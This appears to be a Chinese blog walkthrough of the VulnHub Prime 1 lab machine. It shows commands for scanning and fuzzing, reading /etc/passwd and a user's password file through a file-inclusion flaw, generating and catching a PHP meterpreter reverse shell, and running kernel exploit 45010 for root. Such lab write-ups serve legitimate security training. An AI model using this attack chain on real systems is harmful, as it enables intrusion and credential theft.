vlunhub系列之prime

已于 2023-08-05 23:59:43 修改
阅读量141 收藏
点赞数
分类专栏: 靶机 文章标签: 安全 linux
于 2023-08-05 23:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanjinming110/article/details/132126026
版权

靶机prime1

使用nmap进行扫描

nmap -sS -T4 192.168.12.0/24

在这里插入图片描述

发现发放端口,去访问一下(并没有可以利用的漏洞)在这里插入图片描述

看一下源码:
在这里插入图片描述

啥也没有
我们可以使用dirb和nikito对网站根目录进行扫描

dirb http://192.168.12.129
nikto -host http://192.168.12.129

dirb扫描结果:
在这里插入图片描述

nikto扫描结果:
在这里插入图片描述

扫描出来了很多目录,我们可以发现该网站框架是wordpress,接着我们访问一下/dev目录看看有没有发现
在这里插入图片描述

上面的意思大概就说 我现在在最低层 而他在web最高处,我们可以发现dirb普通扫描并没有给我们带来很多有价值的东西,我们现在开始单独扫描php,txt,zip等文件看看有没有什么关键信息
所以我们需要去找一下啊php txt zip等一些敏感的后缀

dirb http://192.168.12.129 -X .php,.txt,.zip 这里只是筛选php txt 与 zip的

在这里插入图片描述

这里我们扫出来3个我们可以去访问一下
在这里插入图片描述

这里给我提示,说我们看到location.txt的时候将会进行下一步(这里给我们的提示是让我们是用fuzz来解决)

在这里插入图片描述

在这里我们也去找了fuzz是什么
接着我们就是用fuzz命令来对此网站进行探测

wfuzz -v -w /usr/share/wfuzz/wordlist/general/common.txt
http://192.168.12.129/image.php?FUZZ=location.txt

可以看到有很多的内容,我们需要对内容进行筛选(这里我选择过滤lines 使用参数hl)

在这里插入图片描述

wfuzz -v -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 http://192.168.12.129/image.php?FUZZ=location.txt

在浏览器输入http://192.168.12.129/index.php?file=location.txt有回显

在这里插入图片描述
这里提示我们,让我们使用secrettier360,我们可以尝试着使用一下

在这里插入图片描述

这里说我们需要进行跟多的操作:

http://192.168.12.129/image.php?secrettier360=/etc/passwd

这里出来一串

在这里插入图片描述

这里又给了我们结论,让我们在我的目录下面找到/password.txt这个文件

在这里插入图片描述

http://192.168.12.129/image.php?secrettier360=/home/saket/password.txt
我们找到这个以后

这里我们得到密码(follow_the_ippsec)

在这里插入图片描述

在这里我们要知道,这个网站是使用wordpress搭建的,所以我们可以使用wpscan去扫描以下这个wordpress有什么可以利用的地方

wpscan --url http://192.168.12.129/wordpress -e 对网站进行扫描

这里扫描出来很多, 我们看看有没有可以登录的什么网站没有

在这里插入图片描述

这个主页面有一个登录框

在这里插入图片描述

在这里我们发现一个用户名

在这里插入图片描述

wordpress服务是有一个登陆的地方的,正好我们也找到了用户名是victor,所以我们可以登陆

在这里插入图片描述

victor:follow_the_ippsec

在这里插入图片描述

这里我们就成功的登陆进来这个网站

在这里插入图片描述

在这里我们发现一个可以用来编辑的地方,而且这里是使用的是php
那这里如果我们写一个webshell放在这里,就可以完美的做到一个反弹shell,所以我们去msf操作

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.12.20 lport=4444
-o /a/shell.php 生成一个php的webshell

在这里插入图片描述

我们只需要将这一串粘贴到网站中,建立监听即可

在这里插入图片描述

这里上传成功,那么我们就可以建立监听了

在这里插入图片描述

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) set payload php/meterpreter/reverse_tcp
payload=>php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.12.20
lhost => 192.168.12.20
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

在这里插入图片描述

在这里插入图片描述

然后去访问我们的php

在这里插入图片描述

这里我们的meterpreter成功的反弹到
我们进入shell

在这里插入图片描述

这里成功拿下

python -c ‘import pty;pty.spawn(“/bin/bash”)’ 优化终端

这里发现并不是root权限,我们需要提权

在这里插入图片描述

sudo -l 这里发现可以利用提权的漏洞

在这里插入图片描述

但是这里enc并没有访问权限

在这里插入图片描述

我们就只能找找内核,看内核有什么漏洞了

在这里插入图片描述

是ubuntu 4.10.0版本 16.04.2的版本,我们可以搜一下

searchsploit 16.04 ubuntu

这里我们找到了可以利用的漏洞,正好符合这个机器

在这里插入图片描述

我们开始操作

cd /usr/share/exploitdb/exploits/linux/local
cp 45010.c ./root
cd /root
gcc 45010.c -o aaa 起个名字,aaa

meterpreter提供了upload命令可以将攻击机的文件传到靶机,tmp是所有用户都有访问权限的故放在靶机的tmp目录下 所以我们可以直接将他传上去 使用upload

meterpreter > upload /root/aaa /tmp/aaa
meterpreter > ls /tmp

在这里插入图片描述

我们进入shell 将aaa提权,而后执行

cd /tmp
chmod u+x aaa
./aaa

执行完成,我们进入root找到flag

在这里插入图片描述

后续还会对此系列的靶机进行更新,希望对大家有所帮助!!!!

JM丫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vega prime
珂珂可爱多
07-22 6565
首先你应该是知道的,这两款软件是收费的哦,因此想要免费使用的话,还是需要费一番功夫去破解的,当时老师给我布置相关的论文题目是可真的是没少花功夫在破解这两款软件上,而且网上的资料真的是少之又少,可能是因为他们是军用比较多吧。下面给大家介绍下我是如何破解这两款软件的,希望对刚接触的朋友有所帮助。 本文是安装Vegaprime(以后简称VP)的步骤。。creator安装一般比较顺利不会遇...
linux prime,LinuxPrime95 (MPrime)
weixin_39880479的博客
05-25 1746
Prime95 是用來做 CPU 壓力測試的,由 GIMPS (Great Internet Mersenne Prime Search)所提供,主要是透過運算找出梅森質數,什麼是 質數(Prime number)指的是除了 1 和自身外,無法被其他自然數整除,何謂梅森質數 是指 2n − 1 ,是質數,就被稱為 梅森質數.軟體可以從 https://www.mersenne.org/downlo...
web扫描工具-dirb
weixin_59114667的博客
03-02 315
功能:查看每个请求的http响应代码
数据结构图之prime算法详解
&volume的博客
05-12 2072
本篇为文章是写的prime算法,本人见书上算法只有伪代码于是想着写出一个能跑的prime算法 本人写了一个下午的prime算法,但是运行的结果是不正确的 (本人是个小菜鸡) 经过朋友的帮助,运行结果正确。 我觉得算法主要先理解思想 在去试图打出分部的伪代码 最后打出能跑的代码 不多说上代码 # include <stdio.h> # define m 31715 # define maxs 100 typedef struct { int v[maxs]; //..
E-prime2.0安装教程及软件下载
悦影科技
12-07 8173
E-prime软件是由美国PST公司开发的一套用于视听刺激呈现的系统,主要用于神经科学、脑科学、认知神经科学和心理学等领域,可与EEG和fMRI技术相结合,研究被试特定任务下的EEG和fMRI信号的变化特性。E-prime软件应该是目前应用最为广泛的视听刺激呈现软件,这主要是由于其面向对象和流程化的实验设计方法,即在实验设计时只需要把特定的功能图标拖到实验程序内,快速完成较为复杂的实验设计。公众号之前推送过《E-Prime1.1安装教程及软件下载》的推文,但是有不少粉丝在后台询问是否有E-prime2.0的
python中prime_Python prime
weixin_39972151的博客
12-22 2627
最新项目auto reload_prime----autoreload_prime应该与大多数服务器一起工作的自动重新加载模块(从tornado修补)。要安装autoreload_prime,只需执行以下操作 ...2020-12-22已阅读: n次PIAPI模块代表(Cisco)Prime Infrastructure API。该模块实现了piapi类,该类有助于使用可以请求数据或请求操作的简单...
Eprime与EEG的接口
Iris_bysshqx17的博客
10-08 4361
写在最前 不要焦虑,不要弃疗,写好程序之后要去实际的机器上调试! 背景 EEG脑电信号记录的是一段时间内连续的信号,而我们需要某个特定时间段内的脑电信号,而不是全部的信号。为了实现这一目标,我们需要mark,也就是在连续的脑电信号上打上一个标记。从而让数据分析的人知道需要哪一段的信息。 比如说,一个Eprime实验中出现了黄色的“绿”字(mark=5)和绿色的“绿”字(mark=6),这是两种可以...
Python - 素数(Prime
热门推荐
09-05 1万+
素数:一个大于1的自然数,除了1和它本身外,不能被其他自然数整除; 【引例】求1000以内的素数: from math import sqrt print(" ".join("%s"% x for x in range(2,1000)if not[y for y in range(2,int(sqrt(x)))if not x%y])) def prime1(data) ->...
prime c 语言,prime,素数的判断——c语言
weixin_39593718的博客
05-20 3759
输入一个数a,求他是否是素数(用函数)程序:#includeint prime(int a)-----------------------------------//定义一个prime的自定义函数{int i,y=0;for(i=1;i<=a;i++){if(a%i!=0)y++;}------------------------------------------//判断是不是素数retu...
c语言中prime的作用,C语言判断素数prime
weixin_39922147的博客
05-17 3211
《C语言判断素数prime》由会员分享,可在线阅读,更多相关《C语言判断素数prime(2页珍藏版)》请在人人文库网上搜索。1、主函数:#include int prime();void main()int number;int flag;printf (请输入一个大于1的整数:);scanf (%d,&number);flag = prime(number);if(flag=1)prin...
Prime Time脚本
03-11
pt全套脚本,包含ReadME等指导使用
Java贪心算法之Prime算法原理与实现方法详解
08-29
主要介绍了Java贪心算法之Prime算法原理与实现方法,简单描述了Prime算法的概念、原理、实现与使用技巧,需要的朋友可以参考下
prime95使用教程.pdf
06-24
prime95使用教程.pdfprime95使用教程.pdfprime95使用教程.pdfprime95使用教程.pdfprime95使用教程.pdfprime95使用教程.pdf
check prime_Primenumber_
09-30
C program to check if a number is prime or not
Eprime 2.0安装包.rar
02-25
亲测有效
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 358
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
最新发布
lurenjia404的博客
05-15 919
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 463
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
Verilog prime
04-04
Verilog Prime是一种硬件描述语言(HDL),用于描述数字电路的行为和结构。它是Verilog HDL的扩展版本,提供了更多的功能和语法特性。 Verilog Prime具有以下特点: 1. 支持面向对象编程:Verilog Prime引入了类和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JM丫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值